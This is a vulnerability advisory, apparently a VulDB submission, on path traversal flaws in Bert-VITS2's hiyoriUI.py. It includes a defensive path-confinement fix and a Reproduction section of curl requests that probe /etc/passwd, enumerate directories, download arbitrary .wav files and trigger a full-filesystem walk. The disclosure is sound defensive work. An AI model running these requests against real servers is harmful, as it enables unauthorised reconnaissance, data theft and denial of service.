| Title | fishaudio Bert-VITS2 latest (commit 724d0b2) Path Traversal (CWE-22) |
|---|---|

# Description

# Technical Details
Multiple path traversal vulnerabilities exist in the `_get_all_models()`, `get_audio()`, and `random_example()` functions in `hiyoriUI.py` of Bert-VITS2.
The application neither validates nor sanitizes user-supplied path parameters before passing them to `os.listdir()`, `os.path.isfile()`, `FileResponse()`, and `os.walk()`, and it binds the server to x.x.x.x with no authentication, so every endpoint is reachable by unauthenticated remote attackers.
# Vulnerable Code
- File: `hiyoriUI.py` (L510–513), method `_get_all_models()`
  Why: the user-controlled `root_dir` is passed directly to `os.listdir()`, enabling arbitrary directory enumeration via differential HTTP responses (200 vs 500).
- File: `hiyoriUI.py` (L716–727), method `get_audio()`
  Why: the user-controlled `path` is passed to `os.path.isfile()` before the extension is validated, creating a file existence oracle (status 18 vs 19); any `.wav` file on the filesystem can then be downloaded via `FileResponse()`.
- File: `hiyoriUI.py` (L634–654), method `random_example()`
  Why: the user-controlled `root_dir` is passed directly to `os.walk()`, enabling recursive traversal of arbitrary directories and a potential DoS via a full filesystem walk.
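The check that a fix for `get_audio()` and the `root_dir` parameters would need, written as an added example (not code from Bert-VITS2 or from the submission): the serving root `Data`, the helper names and the `PathRejected` error are assumptions. It validates the extension before any filesystem call, refuses absolute values, and resolves both sides so `..` hops and symlinks cannot escape the root.

```python
import os
import tempfile
from pathlib import Path

class PathRejected(ValueError):
    """Raised for any request value that must not reach the filesystem."""

def resolve_under(base: str, requested: str) -> Path:
    """Resolve `requested` relative to `base`; refuse anything that lands outside.
    Both sides are resolved, so `..` hops and symlinks pointing out of `base` fail."""
    if os.path.isabs(requested):
        raise PathRejected("absolute paths are not accepted")
    base_real = Path(base).resolve()
    candidate = (base_real / requested).resolve()
    if candidate != base_real and base_real not in candidate.parents:
        raise PathRejected(f"path escapes {base_real}")
    return candidate

def safe_audio_path(base: str, requested: str) -> Path:
    """Confined stand-in for get_audio(): extension check first, then containment,
    and only then an existence check, so nothing outside `base` is ever probed."""
    if not requested.lower().endswith(".wav"):
        raise PathRejected("only .wav files are served")
    candidate = resolve_under(base, requested)
    if not candidate.is_file():
        raise PathRejected("not found")
    return candidate

def safe_listdir(base: str, requested: str) -> list:
    """Confined stand-in for the root_dir parameter of _get_all_models()."""
    return sorted(os.listdir(resolve_under(base, requested)))

def demo() -> dict:
    """Exercise the checks on a constructed layout inside a temporary directory."""
    with tempfile.TemporaryDirectory() as tmp:
        base = os.path.join(tmp, "Data")            # assumed serving root
        os.makedirs(os.path.join(base, "models"))
        Path(base, "models", "voice.wav").write_bytes(b"RIFF")
        Path(tmp, "secret.wav").write_bytes(b"RIFF")  # lives outside the root
        cases = {"dotdot": "../secret.wav", "absolute": os.path.join(tmp, "secret.wav"),
                 "ext": "models/notes.txt", "missing": "models/nope.wav"}
        out = {"ok": safe_audio_path(base, "models/voice.wav").name,
               "list": safe_listdir(base, "models")}
        for label, req in cases.items():
            try:
                out[label] = safe_audio_path(base, req).name
            except PathRejected as exc:
                out[label] = str(exc)
        return out
```

Because every rejected request fails before `is_file()` runs, the existence oracle described above disappears: the response differs only for files that are already inside the root.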
# Reproduction
1. Enumerate directories (existence oracle):
   ```bash
   curl "http://<target>:5000/models/get_local?root_dir=/etc"          # HTTP 200 = exists
   curl "http://<target>:5000/models/get_local?root_dir=/nonexistent"  # HTTP 500 = does not exist
   ```
2. Probe arbitrary file existence:
   ```bash
   curl "http://<target>:5000/tools/get_audio?path=/etc/passwd"   # status 19 = file exists
   curl "http://<target>:5000/tools/get_audio?path=/etc/nothere"  # status 18 = file missing
   ```
3. Read an arbitrary `.wav` file:
   ```bash
   curl "http://<target>:5000/tools/get_audio?path=/path/to/secret.wav" --output stolen.wav
   ```
4. Trigger DoS via a full filesystem walk:
   ```bash
   curl "http://<target>:5000/tools/random_example?root_dir=/"
   ```
# Impact
- Unauthenticated remote filesystem enumeration (directory and file existence oracle)
- Arbitrary `.wav` file read (sensitive voice/audio data exfiltration)
- Denial of service via unbounded `os.walk("/")` recursive filesystem traversal
- Reconnaissance enablement for further targeted attacks (SSH keys, config files)
| Field | Value |
|---|---|
| Source | https://gist.github.com/YLChen-007/99859f4f836cca523a5982645e7fdd97 |
| User | Eric-b (UID 96354) |
| Submission | 23.04.2026 09:32 (1 month ago) |
| Moderation | 16.05.2026 19:37 (23 days later) |
| Status | Accepted |
| VulDB Entry | 364382 [fishaudio Bert-VITS2 up to 8f7fbd8c4770965225d258db548da27dc8dd934c Model hiyoriUI.py _get_all_models Directory Traversal] |
| Points | 20 |